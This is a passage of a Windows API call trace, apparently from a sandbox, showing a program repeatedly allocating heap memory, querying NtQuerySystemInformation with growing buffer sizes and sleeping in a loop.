returned 0x29585b8 [0235.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.394] Sleep (dwMilliseconds=0x110) [0235.403] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.403] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.404] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.404] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.404] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.406] Sleep (dwMilliseconds=0x110) [0235.459] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.460] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.460] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.460] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.460] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.461] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.461] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.461] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.461] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.461] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.461] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.462] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.462] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.463] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.463] Sleep (dwMilliseconds=0x110) [0235.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.470] Sleep (dwMilliseconds=0x110) [0235.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.485] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.486] Sleep (dwMilliseconds=0x110) [0235.506] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.506] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.507] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.507] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.507] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.507] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.507] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.507] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.508] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.508] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.508] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.508] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.508] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.508] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.509] Sleep (dwMilliseconds=0x110) [0235.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.519] Sleep (dwMilliseconds=0x110) [0235.528] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.528] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.529] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.532] Sleep (dwMilliseconds=0x110) [0235.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.550] Sleep (dwMilliseconds=0x110) [0235.559] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.559] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.560] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.565] Sleep (dwMilliseconds=0x110) [0235.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.583] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.584] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.584] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.587] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.588] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.589] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.589] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.589] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.590] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.590] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.591] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.599] Sleep (dwMilliseconds=0x110) [0235.678] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.678] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.679] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.679] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.679] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.679] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.680] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.680] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.681] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.681] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.681] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.681] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.681] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.682] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.682] Sleep (dwMilliseconds=0x110) [0235.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.707] Sleep (dwMilliseconds=0x110) [0235.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.720] Sleep (dwMilliseconds=0x110) [0235.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 